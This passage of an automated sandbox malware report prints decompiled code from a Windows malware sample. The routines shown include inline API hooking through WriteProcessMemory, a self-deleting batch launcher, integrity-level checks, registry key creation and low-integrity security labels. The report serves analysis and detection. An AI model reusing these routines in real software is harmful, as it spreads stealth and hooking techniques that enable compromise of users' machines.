									_v1596 = E0041787A(0, _t129, __eflags, _t138, 0x4e23, 0x10000000);
									E00411CFE(_t138);
									__eflags = _v1600;
									if(_v1600 == 0) {
										_t131 = _a4;
										goto L33;
									} else {
										_v1564 = _v1564 & 0;
										_t108 = E00407242(_t128, _t129,  &_v1564, 1);
										_t131 = _a4;
										__eflags = _t108;
										if(_t108 == 0) {
											L33:
											_t125 = _v1597;
										} else {
											_t131[8] = _t131[8] | 0xffffffff;
											_t110 = E00407A3F( &_v1584);
											__eflags = _t110;
											_t125 = (0 | _t110 != 0x00000000) - 0x00000001 & 0x00000002;
											E00417CA7( &(_t131[8]));
											E00411CFE(_v1564);
										}
									}
									E00411CFE(_v1584);
									__eflags = _t125 - 2;
									if(_t125 != 2) {
										__eflags = _t125;
										if(_t125 != 0) {
											goto L29;
										} else {
											_t84 = _v1596;
										}
									} else {
										_t84 = _v1592;
									}
								}
							} else {
								asm("sbb ebx, ebx");
								E00407101( !( ~(_v1548 & 0x0000ffff)) &  &_v1548, _t128, 0);
								_t123 =  &(_t131[0x122]);
								_t89 = GetFileAttributesW( &_v1552);
								__eflags = _t89 - 0xffffffff;
								if(_t89 == 0xffffffff) {
									_t89 = GetFileAttributesW(0x4223a8);
									__eflags = _t89 - 0xffffffff;
									if(_t89 == 0xffffffff) {
										goto L29;
									} else {
										_t128 = 0x4223a8;
										goto L14;
									}
								} else {
									_t128 =  &_v1548;
									L14:
									_t129 = _t123;
									E0041209F(_t89 | 0xffffffff, _t128, _t129);
									_t140 = CreateFileW(_t123, 0x80000000, 7, 0, 3, 0, 0);
									__eflags = _t140 - 0xffffffff;
									if(_t140 == 0xffffffff) {
										L28:
										E00417064(_t123);
										goto L29;
									} else {
										_v1560 = E0041703D(_t128, _t140);
										_t134 = _t129;
										CloseHandle(_t140);
										__eflags = _v1560 - 0xffffffff;
										if(_v1560 != 0xffffffff) {
											L17:
											__eflags = _t134;
											if(__eflags > 0) {
												goto L28;
											} else {
												if(__eflags < 0) {
													L20:
													_t98 = lstrcmpiW(_t123,  &_v1548);
													__eflags = _t98;
													if(_t98 == 0) {
														goto L24;
													} else {
														_t141 = E0041CA33(_t128, 0x8793aef2, 2);
														__eflags = _t141;
														if(_t141 == 0) {
															L29:
															_t131 = _a4;
															_t84 = 0x7530;
														} else {
															_t101 = MoveFileExW(_t123,  &_v1548, 0xb);
															__eflags = _t101;
															if(_t101 == 0) {
																goto L29;
															} else {
																E004154D1(_t141);
																__eflags = _t101 | 0xffffffff;
																_t128 =  &_v1552;
																_t129 = _t123;
																E0041209F(_t101 | 0xffffffff,  &_v1552, _t123);
																goto L24;
															}
														}
													}
												} else {
													__eflags = _v1556 - 0xffffffff;
													if(_v1556 > 0xffffffff) {
														goto L28;
													} else {
														goto L20;
													}
												}
											}
										} else {
											__eflags = _t134;
											if(_t134 == 0) {
												goto L28;
											} else {
												goto L17;
											}
										}
									}
								}
							}
							_t85 = WaitForSingleObject( *0x424024, _t84);
							__eflags = _t85 - 0x102;
						} while (_t85 == 0x102);
					}
					E004154D1(_v1588);
					_t136 = 0;
				} else {
					_t136 = 1;
				}
				E00411CFE(_t131);
				return _t136;
			}

0x00407622
0x00407631
0x00407645
0x0040764a
0x00407650
0x0040766b
0x00407676
0x00407681
0x00407689
0x00407691
0x00407695
0x004076af
0x004076b7
0x004076b7
0x004076b9
0x004076dd
0x004076dd
0x004076e0
0x004076e4
0x00000000
0x004076bb
0x004076bb
0x004076bc
0x004076c8
0x004076cc
0x004076ec
0x004076ec
0x004076ec
0x004076bc
0x004076fa
0x0040770d
0x0040771a
0x00407721
0x00407726
0x0040772b
0x0040772d
0x00407733
0x00407733
0x00407736
0x0040773b
0x0040783b
0x0040783b
0x00407840
0x00407842
0x00407844
0x00000000
0x00407846
0x00407859
0x0040785d
0x00407862
0x00407866
0x004078de
0x00000000
0x00407868
0x00407868
0x00407873
0x00407878
0x0040787b
0x0040787d
0x004078e1
0x004078e1
0x0040787f
0x00407882
0x00407889
0x0040788e
0x00407895
0x00407898
0x004078a1
0x004078a1
0x0040787d
0x004078e9
0x004078ee
0x004078f1
0x004078f9
0x004078fb
0x00000000
0x004078fd
0x004078fd
0x004078fd
0x004078f3
0x004078f3
0x004078f3
0x004078f1
0x00407741
0x00407748
0x00407754
0x00407764
0x0040776a
0x0040776c
0x0040776f
0x0040777d
0x0040777f
0x00407782
0x00000000
0x00407788
0x00407788
0x00000000
0x00407788
0x00407771
0x00407771
0x0040778a
0x0040778d
0x0040778f
0x004077a9
0x004077ab
0x004077ae
0x004078a8
0x004078a9
0x00000000
0x004077b4
0x004077bb
0x004077bf
0x004077c1
0x004077c7
0x004077cc
0x004077d6
0x004077d6
0x004077d8
0x00000000
0x004077de
0x004077de
0x004077eb
0x004077f1
0x004077f7
0x004077f9
0x00000000
0x004077fb
0x00407807
0x00407809
0x0040780b
0x004078ae
0x004078ae
0x004078b1
0x00407811
0x00407819
0x0040781f
0x00407821
0x00000000
0x00407827
0x00407828
0x0040782d
0x00407830
0x00407834
0x00407836
0x00000000
0x00407836
0x00407821
0x0040780b
0x004077e0
0x004077e0
0x004077e5
0x00000000
0x00000000
0x00000000
0x00000000
0x004077e5
0x004077de
0x004077ce
0x004077ce
0x004077d0
0x00000000
0x00000000
0x00000000
0x00000000
0x004077d0
0x004077cc
0x004077ae
0x0040776f
0x004078bd
0x004078c3
0x004078c3
0x00407733
0x004078d2
0x004078d7
0x00407652
0x00407654
0x00407654
0x00407656
0x00407663

APIs

Part of subcall function 0041CA33: CreateMutexW.KERNEL32(00423B98,00000000,?,?,?,?,?), ref: 0041CA54

GetFileAttributesW.KERNEL32(?,00000000,?,00000000,000002F4,?,?,00000102), ref: 0040776A
CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004077A3
CloseHandle.KERNEL32(00000000,00000000), ref: 004077C1
lstrcmpiW.KERNEL32(?,?), ref: 004077F1

Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CreateFile$AttributesCloseFreeHandleHeapMutexlstrcmpi
String ID:
API String ID: 503543330-0
Opcode ID: bd98d27c259e255319321df5aced84edada47899d7b22f6d1ea45ac37e3e4186
Instruction ID: f133d4a1a4bd2e659239ae874d5d9fe09090d8b73be04d01fab6ca3c837ab7e8
Opcode Fuzzy Hash: bd98d27c259e255319321df5aced84edada47899d7b22f6d1ea45ac37e3e4186
Instruction Fuzzy Hash: A271C371908351ABD310EB34C885AABB7E8AF84314F104A3FF595A72D1D738E945C79B

Uniqueness

Uniqueness Score: -1.00%

Function 00416545, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108
injectionCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00416545(void* __eax, intOrPtr __ecx, void* __edx, void* __eflags, void* _a4, char _a8) {
				long _v8;
				DWORD* _v12;
				intOrPtr _v47;
				void _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t47;
				void* _t58;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				intOrPtr* _t66;
				long _t68;
				DWORD* _t69;
				void* _t71;

				_t63 = __edx;
				_t61 = __ecx;
				_t58 = __eax;
				_t69 = 0;
				_v12 = 0;
				if(E00416500(_a4) < 0x1e || VirtualProtectEx(0xffffffff, _a4, 0x1e, 0x40,  &_v8) == 0) {
					L18:
					return _v12;
				} else {
					E00411DB1( &_v48,  &_v48, 0xffffff90, 0x23);
					if(ReadProcessMemory(0xffffffff, _a4,  &_v48, 0x1e, 0) == 0) {
						L17:
						VirtualProtectEx(0xffffffff, _a4, 0x1e, _v8,  &_v8);
						goto L18;
					} else {
						_t66 =  &_v48;
						_push(0);
						_push(_t66);
						while(1) {
							_t47 = E0041D820(_t58, _t61, _t63, _t66, _t69);
							if(_t47 == 0xffffffff) {
								break;
							}
							_t69 = _t69 + _t47;
							if(_t69 > 0x1e) {
								L16:
								goto L17;
							}
							_t61 =  *_t66;
							if(_t61 == 0xe9 || _t61 == 0xe8) {
								if(_t47 == 5) {
									_t10 =  &_a8; // 0x422020
									 *((intOrPtr*)(_t66 + 1)) =  *((intOrPtr*)(_t66 + 1)) + _a4 -  *_t10;
								}
							}
							_push(0);
							if(_t69 >= 5) {
								_t16 =  &_a8; // 0x422020
								_t17 = _t69 + 5; // 0x5
								_t68 = _t17;
								 *((intOrPtr*)(_t71 + _t69 - 0x2b)) = _a4 -  *_t16 - 5;
								_t21 =  &_a8; // 0x422020
								 *((char*)(_t71 + _t69 - 0x2c)) = 0xe9;
								if(WriteProcessMemory(0xffffffff,  *_t21,  &_v48, _t68, ??) != 0) {
									_t62 = _a4;
									_v48 = 0xe9;
									_v47 = _t58 - _t62 - 5;
									E00404C12(_t62, _a8);
									if(WriteProcessMemory(0xffffffff, _t62,  &_v48, 5, 0) != 0) {
										_v12 = _t68;
									}
								}
								goto L16;
							}
							_t66 = _t71 + _t69 - 0x2c;
							_push(_t66);
						}
						goto L16;
					}
				}
			}

0x00416545
0x00416545
0x0041654d
0x00416552
0x00416554
0x0041655f
0x00416659
0x0041665f
0x00416580
0x00416588
0x004165a1
0x00416645
0x00416653
0x00000000
0x004165a7
0x004165a8
0x004165ab
0x004165ae
0x004165e2
0x004165e2
0x004165ea
0x00000000
0x00000000
0x004165b1
0x004165b6
0x00416644
0x00000000
0x00416644
0x004165bc
0x004165c1
0x004165cb
0x004165d0
0x004165d3
0x004165d3
0x004165cb
0x004165d6
0x004165db
0x004165f1
0x004165f4
0x004165f4
0x004165fa
0x00416603
0x00416606
0x00416617
0x00416619
0x00416624
0x00416628
0x0041662b
0x0041663f
0x00416641
0x00416641
0x0041663f
0x00000000
0x00416617
0x004165dd
0x004165e1
0x004165e1
0x00000000
0x004165ec
0x004165a1

APIs

Part of subcall function 00416500: VirtualQueryEx.KERNEL32(000000FF,?,?,0000001C,00000008,?,?,?,?,00404BB2,00000000,00000000,00000034,00404F3D,00422020,00000000), ref: 00416515

VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,00000040,0041C5EC,-00000008,00000034,?,?,00404CD3,?,00000000,?,?,00404F3D,00422020), ref: 00416572
ReadProcessMemory.KERNEL32(000000FF,00000000,?,0000001E,00000000,?,00000090,00000023,?,?,00404CD3,?,00000000,?,?,00404F3D), ref: 00416599
WriteProcessMemory.KERNEL32(000000FF, B,?,00000005,00000000,?,00000000,00000000,?,?,00404CD3,?,00000000,?,?,00404F3D), ref: 00416613
WriteProcessMemory.KERNEL32(000000FF,?,000000E9,00000005,00000000,?,?,00404CD3,?,00000000,?,?,00404F3D,00422020,00000000,0041C5EC), ref: 0041663B
VirtualProtectEx.KERNEL32(000000FF,00000000,0000001E,0041C5EC,0041C5EC,?,?,00404CD3,?,00000000,?,?,00404F3D,00422020,00000000,0041C5EC), ref: 00416653

Strings

B, xrefs: 004165F1, 00416603, 004165D0

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: MemoryProcessVirtual$ProtectWrite$QueryRead
String ID: B
API String ID: 390532180-3394935788
Opcode ID: 776bf14a539508c82048bacf09a919d6e01f1839650257c1c2e6dce6f4d36c7f
Instruction ID: 344bcddd1ac83043effed485cb81ecf11fe29ce293b001ad2d82495a68071c1f
Opcode Fuzzy Hash: 776bf14a539508c82048bacf09a919d6e01f1839650257c1c2e6dce6f4d36c7f
Instruction Fuzzy Hash: 43319172900218BBDF109FB8DD45EDE7BA9EB09330F118316FA31A62D0C634D980CB68

Uniqueness

Uniqueness Score: -1.00%

Function 004182AC, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E004182AC(void* __ecx, signed int __edx, void* __eflags, struct HDC__* _a4, BITMAPINFO** _a8, char _a12, void* _a16, long _a20, void* _a24) {
				int _v8;
				void* _t37;
				long _t38;
				struct HBITMAP__* _t46;
				void* _t47;
				signed int _t56;
				signed int _t57;
				BITMAPINFO** _t62;
				BITMAPINFO* _t64;

				_t57 = __edx;
				_v8 = 0;
				_t64 = E00411CCE(0x428);
				if(_t64 == 0) {
					L14:
					if(_a24 != 0) {
						DeleteObject(_a24);
					}
					L16:
					return _v8;
				}
				_t64->bmiHeader = 0x28;
				if(GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0 || GetDIBits(_a4, _a24, 0, 1, 0, _t64, 0) == 0) {
					L13:
					E00411CFE(_t64);
					goto L14;
				} else {
					DeleteObject(_a24);
					asm("cdq");
					_t56 =  ~((_t64->bmiHeader.biHeight ^ __edx) - __edx);
					_t37 = (_t64->bmiHeader.biBitCount & 0x0000ffff) - 1;
					_a24 = 0;
					_t64->bmiHeader.biHeight = _t56;
					if(_t37 == 0) {
						L7:
						_t64->bmiHeader.biClrUsed = 0;
						_push(8);
						_t64->bmiHeader.biClrImportant = 0;
						L8:
						_pop(_t38);
						_t64->bmiHeader.biBitCount = _t38;
						L9:
						_t62 = _a8;
						asm("cdq");
						_t58 = _t57 & 0x00000007;
						asm("cdq");
						_t64->bmiHeader.biSizeImage = ((_t64->bmiHeader.biBitCount & 0x0000ffff) * _t64->bmiHeader.biWidth * _t56 + (_t57 & 0x00000007) >> 0x00000003 ^ _t58) - _t58;
						_t64->bmiHeader.biCompression = 0;
						if(_t62 != 0) {
							 *_t62 = _t64;
						}
						_t21 =  &_a12; // 0x422938
						_t46 = CreateDIBSection(_a4, _t64, 0,  *_t21, _a16, _a20);
						_v8 = _t46;
						if(_t46 == 0 || _t62 == 0) {
							goto L13;
						} else {
							goto L16;
						}
					}
					_t47 = _t37 - 3;
					if(_t47 == 0) {
						goto L7;
					}
					if(_t47 != 0x14) {
						goto L9;
					}
					_push(0x20);
					goto L8;
				}
			}

0x004182ac
0x004182ba
0x004182c2
0x004182c6
0x0041838e
0x00418391
0x00418396
0x00418396
0x0041839c
0x004183a3
0x004183a3
0x004182db
0x004182e8
0x00418388
0x00418389
0x00000000
0x00418304
0x00418307
0x00418310
0x0041831b
0x0041831d
0x0041831e
0x00418321
0x00418324
0x00418334
0x00418334
0x00418337
0x00418339
0x0041833c
0x0041833c
0x0041833d
0x00418341
0x00418349
0x0041834f
0x00418350
0x00418358
0x0041835d
0x00418360
0x00418365
0x00418367
0x00418367
0x0041836f
0x00418377
0x0041837d
0x00418382
0x00000000
0x00000000
0x00000000
0x00000000
0x00418382
0x00418326
0x00418329
0x00000000
0x00000000
0x0041832e
0x00000000
0x00000000
0x00418330
0x00000000
0x00418330

APIs

GetDIBits.GDI32(00000000,0040B95D,00000000,00000001,00000000,00000000,00000000), ref: 004182E4
GetDIBits.GDI32(00000000,0040B95D,00000000,00000001,00000000,00000000,00000000), ref: 004182FA
DeleteObject.GDI32(0040B95D), ref: 00418307
CreateDIBSection.GDI32(?,00000000,00000000,8)B,2937498D,?), ref: 00418377
DeleteObject.GDI32(0040B95D), ref: 00418396

Strings

8)B, xrefs: 0041836F

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: BitsDeleteObject$CreateSection
String ID: 8)B
API String ID: 1423349713-162386541
Opcode ID: c74de67ebe218fc1b411bd43ad03660a073d4c96930d457d5becde17fc99020f
Instruction ID: 4c8e80cba7744a328a93fd20ddd398eb345ff42b357a33bc68e62cb8db9297a0
Opcode Fuzzy Hash: c74de67ebe218fc1b411bd43ad03660a073d4c96930d457d5becde17fc99020f
Instruction Fuzzy Hash: 5431B37210020EAFDF209F65CD849AF7AE9EF14740B08852EF955D6660CB36DD918B64

Uniqueness

Uniqueness Score: -1.00%

Function 004137BE, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E004137BE(void* __ebx, void* __edi, char _a4) {
				short _v24;
				intOrPtr _v28;
				char _v72;
				short _v592;
				char _v852;
				char _v1392;
				void* _t35;
				char _t56;

				if(E00417085(L"bat",  &_v592) == 0) {
					L7:
					return 0;
				}
				CharToOemW( &_v592,  &_v852);
				_push( &_v852);
				if(E00412AC2( &_a4, "@echo off\r\n%s\r\ndel /F \"%s\"\r\n", _a4) == 0xffffffff) {
					L6:
					E00417064( &_v592);
					goto L7;
				}
				_t35 = E00416EB9( &_v592, _a4, _t31);
				E00411CFE(_a4);
				if(_t35 == 0) {
					goto L6;
				}
				_push(__edi);
				_push( &_v592);
				if(E004129F1( &_v592, 0x10e,  &_v1392, L"/c \"%s\"") <= 0xffffffff || GetEnvironmentVariableW(L"ComSpec",  &_v592, 0x104) - 1 > 0x102) {
					goto L6;
				} else {
					_t56 = 0x44;
					E00411DB1( &_v72,  &_v72, 0, _t56);
					_v24 = 0;
					_v72 = _t56;
					_v28 = 1;
					return E004135C5( &_v592,  &_v1392, 0,  &_v72, 0) & 0xffffff00 | _t48 != 0x00000000;
				}
			}

0x004137da
0x004138cc
0x00000000
0x004138cc
0x004137ee
0x004137fa
0x00413812
0x004138c0
0x004138c7
0x00000000
0x004138c7
0x00413824
0x0041382e
0x00413836
0x00000000
0x00000000
0x0041383c
0x00413843
0x0041385f
0x00000000
0x00413880
0x00413882
0x0041388a
0x00413892
0x004138aa
0x004138ad
0x00000000
0x004138bb

APIs

Part of subcall function 00417085: GetTempPathW.KERNEL32(000000F6,?), ref: 0041709C

CharToOemW.USER32 ref: 004137EE

Part of subcall function 00416EB9: CreateFileW.KERNEL32(004137D8,40000000,00000001,00000000,00000002,00000080,00000000,00000000,00000000,?,004170F8,004137D8,00000000,00000000,004137D8,?), ref: 00416ED3
Part of subcall function 00416EB9: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,004170F8,004137D8,00000000,00000000,004137D8,?), ref: 00416EF6
Part of subcall function 00416EB9: CloseHandle.KERNEL32(00000000,?,004170F8,004137D8,00000000,00000000,004137D8,?), ref: 00416F03

Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11

GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00413872

Strings

/c "%s", xrefs: 00413844
@echo off%sdel /F "%s", xrefs: 00413801
ComSpec, xrefs: 0041386D
bat, xrefs: 004137CE

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: File$CharCloseCreateEnvironmentFreeHandleHeapPathTempVariableWrite
String ID: /c "%s"$@echo off%sdel /F "%s"$ComSpec$bat
API String ID: 1639923935-3344086482
Opcode ID: 2f46809105057d9d7aa24de2a05bb9e8288c2e6d7ee7e40330a7564b77fd6199
Instruction ID: 61675fb32138fc359f941b8614dea5df19367ddca67ff258e20a536de7fc0523
Opcode Fuzzy Hash: 2f46809105057d9d7aa24de2a05bb9e8288c2e6d7ee7e40330a7564b77fd6199
Instruction Fuzzy Hash: 032182B1901208BADF10EFA4CC46FEE77BCEB04745F204167B508E2191D678DBCA8B68

Uniqueness

Uniqueness Score: -1.00%

Function 00413452, Relevance: 10.6, APIs: 7, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00413452(void* __ecx) {
				long _v8;
				void* _v12;
				char* _t21;
				signed char _t22;
				DWORD* _t25;
				void* _t32;

				_t28 = 0;
				if(OpenProcessToken(0xffffffff, 8,  &_v12) == 0) {
					L14:
					return _t28;
				}
				if(GetTokenInformation(_v12, 0x19, 0, 0,  &_v8) != 0 || GetLastError() != 0x7a) {
					L13:
					CloseHandle(_v12);
					goto L14;
				} else {
					_t32 = E00411CCE(_v8);
					if(_t32 == 0) {
						L12:
						goto L13;
					}
					if(GetTokenInformation(_v12, 0x19, _t32, _v8,  &_v8) != 0) {
						_t21 = GetSidSubAuthorityCount( *_t32);
						if(_t21 != 0) {
							_t22 =  *_t21;
							if(_t22 > 0) {
								_t25 = GetSidSubAuthority( *_t32, (_t22 & 0x000000ff) - 1);
								if(_t25 != 0) {
									if( *_t25 >= 0x2000) {
										asm("sbb bl, bl");
										_t28 = 3;
									} else {
										_t28 = 1;
									}
								}
							}
						}
					}
					E00411CFE(_t32);
					goto L12;
				}
			}

0x00413460
0x0041346a
0x00413500
0x00413504
0x00413504
0x00413486
0x004134f6
0x004134f9
0x00000000
0x00413493
0x0041349c
0x004134a0
0x004134f5
0x00000000
0x004134f5
0x004134b3
0x004134b7
0x004134bf
0x004134c1
0x004134c5
0x004134ce
0x004134d6
0x004134df
0x004134ea
0x004134ec
0x004134e1
0x004134e1
0x004134e1
0x004134df
0x004134d6
0x004134c5
0x004134bf
0x004134f0
0x00000000
0x004134f0

APIs

OpenProcessToken.ADVAPI32(000000FF,00000008,00000001,?,?,?,?,0041C342,00000000,0041C81E), ref: 00413462
GetTokenInformation.ADVAPI32(00000001,00000019(TokenIntegrityLevel),00000000,00000000,00000000,0001FD30,?,?,?,0041C342,00000000,0041C81E), ref: 00413482
GetLastError.KERNEL32(?,?,?,0041C342,00000000,0041C81E), ref: 00413488
GetTokenInformation.ADVAPI32(00000001,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 004134AF
GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,0041C342,00000000,0041C81E), ref: 004134B7
GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,0041C342,00000000,0041C81E), ref: 004134CE
CloseHandle.KERNEL32(00000001,?,?,?,0041C342,00000000,0041C81E), ref: 004134F9

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Token$AuthorityInformation$CloseCountErrorHandleLastOpenProcess
String ID:
API String ID: 3714493844-0
Opcode ID: d1f6af7294fe1bd2fe65cc0d84c897fa65fe5f1f744b42b28f41edb6cb7ea468
Instruction ID: d6dddfac724eface2866c46114b127398c99e13dd0d915702383984522cc1647
Opcode Fuzzy Hash: d1f6af7294fe1bd2fe65cc0d84c897fa65fe5f1f744b42b28f41edb6cb7ea468
Instruction Fuzzy Hash: E4117F35640059BFEB225FA4CE85EEF3B6EDB05311B140076F500E6160E73A9FC5AA68

Uniqueness

Uniqueness Score: -1.00%

Function 0041621C, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041621C(short* _a4) {
				char _v5;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				long _t18;

				_v5 = 0;
				_t18 = RegCreateKeyExW(0x80000001, L"SOFTWARE\\Microsoft", 0, 0, 0, 4, 0,  &_v16, 0);
				_t33 = _t18;
				if(_t18 == 0) {
					_v12 = 0;
					do {
						E00416081(6, 4, _t33, 2, _a4);
						if(RegCreateKeyExW(_v16, _a4, 0, 0, 0, 3, 0,  &_v20,  &_v24) != 0) {
							goto L4;
						} else {
							RegCloseKey(_v20);
							if(_v24 == 1) {
								_v5 = 1;
							} else {
								goto L4;
							}
						}
						L7:
						RegCloseKey(_v16);
						goto L8;
						L4:
						_v12 = _v12 + 1;
					} while (_v12 < 0x64);
					goto L7;
				}
				L8:
				return _v5;
			}

0x00416241
0x00416244
0x00416246
0x00416248
0x00416251
0x00416254
0x0041625d
0x0041627a
0x00000000
0x0041627c
0x0041627f
0x00416285
0x00416292
0x00000000
0x00000000
0x00000000
0x00416285
0x00416296
0x00416299
0x00000000
0x00416287
0x00416287
0x0041628a
0x00000000
0x00416290
0x0041629c
0x004162a2

APIs

RegCreateKeyExW.ADVAPI32(?,SOFTWARE\Microsoft,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 00416244

Part of subcall function 00416081: CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 004161A2

RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,00000003,00000000,?,?,00000002,?), ref: 00416276
RegCloseKey.ADVAPI32(?), ref: 0041627F
RegCloseKey.ADVAPI32(?), ref: 00416299

Strings

d, xrefs: 0041628A
SOFTWARE\Microsoft, xrefs: 00416237

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseCreate$CharUpper
String ID: SOFTWARE\Microsoft$d
API String ID: 1794619670-1227932965
Opcode ID: 55081c08acd64ccc6dcdc45808d9b5464c1005b437db149cec4334e68073675d
Instruction ID: 895308cca878c713374f7ba7b9ef5a6d5b18f33b17e38b670b76746438a6646f
Opcode Fuzzy Hash: 55081c08acd64ccc6dcdc45808d9b5464c1005b437db149cec4334e68073675d
Instruction Fuzzy Hash: 4F1161B190021CBEEB01AB949D80EFFBBBCEF44388F1140A6F90072151D2759E858B75

Uniqueness

Uniqueness Score: -1.00%

Function 0041537F, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E0041537F(intOrPtr _a4) {
				struct _ACL* _v8;
				struct _SECURITY_DESCRIPTOR* _v12;
				int _v16;
				int _v20;
				void** _t11;
				int _t16;
				struct _ACL* _t18;

				_t18 = 0;
				E004133CA(L"SeSecurityPrivilege");
				_t11 =  &_v12;
				__imp__ConvertStringSecurityDescriptorToSecurityDescriptorW(L"S:(ML;CIOI;NRNWNX;;;LW)", 1, _t11, 0);
				if(_t11 != 0) {
					_v8 = 0;
					_t16 = GetSecurityDescriptorSacl(_v12,  &_v20,  &_v8,  &_v16);
					if(_t16 != 0) {
						__imp__SetNamedSecurityInfoW(_a4, 1, 0x10, 0, 0, 0, _v8);
						if(_t16 == 0) {
							_t18 = 1;
						}
					}
					LocalFree(_v12);
				}
				return _t18;
			}

0x0041538b
0x0041538d
0x00415393
0x0041539e
0x004153a6
0x004153b7
0x004153ba
0x004153c2
0x004153d1
0x004153d9
0x004153db
0x004153db
0x004153d9
0x004153e0
0x004153e0
0x004153ea

APIs

Part of subcall function 004133CA: GetCurrentThread.KERNEL32 ref: 004133DA
Part of subcall function 004133CA: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,00410CA8,SeTcbPrivilege), ref: 004133E1
Part of subcall function 004133CA: OpenProcessToken.ADVAPI32(000000FF,00000020,00410CA8,?,?,?,?,00410CA8,SeTcbPrivilege), ref: 004133F3

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 0041539E
GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000), ref: 004153BA
SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 004153D1
LocalFree.KERNEL32(00000000), ref: 004153E0

Strings

S:(ML;CIOI;NRNWNX;;;LW), xrefs: 00415399
SeSecurityPrivilege, xrefs: 00415386

Memory Dump Source

Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp Download File

Similarity

API ID: Security$Descriptor$OpenThreadToken$ConvertCurrentFreeInfoLocalNamedProcessSaclString
String ID: S:(ML;CIOI;NRNWNX;;;LW)$SeSecurityPrivilege
API String ID: 3555451682-1937014404
Opcode ID: dd688c7bc4915bad12d6e442eb5b119a99f11f08a86f49f606785e3db28840af
Instruction ID: d23ebe32668396ebe864892e1e21dbb5c896f3ca7697efe037d0f001a1789905
Opcode Fuzzy Hash: dd688c7bc4915bad12d6e442eb5b119a99f11f08a86f49f606785e3db28840af
Instruction Fuzzy Hash: F901817164020CBFEB109F908D85EEF7B7CEB04740F100422FA12F21A0E6B58A949B28

Uniqueness

Uniqueness Score: -1.00%

Function 00419E89, Relevance: 9.2, APIs: 6, Instructions: 197
windowthreadtimeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00419E89(void* __eax, signed int __ecx, struct HWND__* _a4, signed int _a8, signed int _a12, signed short _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28) {
				long _v8;
				void* __ebx;
				void* __esi;
				signed int _t47;
				signed short _t58;
				int _t65;
				signed int _t66;
				signed short _t75;
				void* _t79;

				_t70 = __ecx;
				_push(__ecx);
				_t75 = _a16;
				_t79 = __eax;
				if(_t75 == 0x201 || _t75 == 0x207 || _t75 == 0x204) {
					_t65 = GetAncestor(_a4, 2);
					if(_t65 ==  *(_t79 + 0x170)) {
						goto L8;
					}
					_t70 = _a12 & 0x0000ffff;
					_t47 = SendMessageTimeoutW(_a4, 0x21, _t65, (_t75 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff, 2, 0x64,  &_v8);
					if(_t47 == 0 || _v8 != 2 && _v8 != 4) {
						 *(_t79 + 0x170) = _t65;
						goto L8;
					} else {
						goto L35;
					}
				} else {
					L8:
					_t66 = _a12 & 0x0000ffff;
					_v8 = _t66;
					PostMessageW(_a4, 0x20, _a4, (_t75 & 0x0000ffff) << 0x00000010 | _t66);
					if(_a12 != 1) {
						_t47 = E00419DAA(_t70, _t79, _a4, _a20);
